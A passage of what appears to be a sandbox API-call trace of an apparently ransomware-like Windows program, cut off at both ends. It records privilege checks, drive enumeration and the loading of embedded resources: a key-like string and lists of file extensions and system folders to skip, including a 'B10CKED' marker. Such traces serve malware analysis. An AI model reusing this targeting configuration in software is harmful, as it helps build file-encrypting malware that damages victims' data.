[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0116.476] EqualSid (pSid1=0x216520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0116.476] GetCurrentProcess () returned 0xffffffff [0116.476] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0116.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0116.476] GetLastError () returned 0x7a [0116.476] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x217790 [0116.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, 
TokenInformation=0x217790, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x217790, ReturnLength=0x12fc64) returned 1 [0116.476] GetSidSubAuthorityCount (pSid=0x217798*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x217799 [0116.476] GetSidSubAuthority (pSid=0x217798*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2177a0 [0116.476] LocalFree (hMem=0x217790) returned 0x0 [0116.476] CloseHandle (hObject=0xb8) returned 1 [0116.476] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0116.476] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0116.476] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0116.476] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0116.478] 
GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.478] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0116.478] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0116.478] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0116.478] LockResource (hResData=0x516824) returned 0x516824 [0116.479] FreeResource (hResData=0x516824) returned 0 [0116.479] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.479] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.479] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.479] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.479] FreeResource (hResData=0x50d64c) returned 0 [0116.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.479] GetCurrentThreadId () returned 0xdf8 [0116.479] GetCurrentThreadId () returned 0xdf8 [0116.479] 
GetCurrentThreadId () returned 0xdf8 [0116.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0116.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 
[0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", 
cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0116.483] CompareStringW (Locale=0x400, 
